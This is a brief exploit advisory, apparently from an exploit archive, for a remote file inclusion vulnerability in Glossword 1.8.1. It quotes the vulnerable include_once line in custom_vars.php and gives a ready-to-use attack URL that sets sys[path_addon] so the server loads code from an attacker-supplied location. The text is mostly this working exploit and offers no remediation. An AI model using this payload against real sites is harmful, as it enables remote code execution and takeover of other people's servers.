id: 1880
date: 05/15/2007
title: Glossword 1.8.1 custom_vars.php Remote File Inclusion Vulnerability
author: BeyazKurt
cves: 

===================================================================
Glossword 1.8.1 custom_vars.php Remote File Inclusion Vulnerability
===================================================================


GlossWord v1.8

--> http://glossword.info/ !

Site : http://sourceforge.net/projects/glossword/

Author : BeyazKurt 


Download : http://sourceforge.net/projects/glossword/

include_once($sys['path_addon'].'/multilingual_vars.php');

[path]/custom_vars.php?sys[path_addon]=EvilC0de



#  0day.today [2023-03-25]  #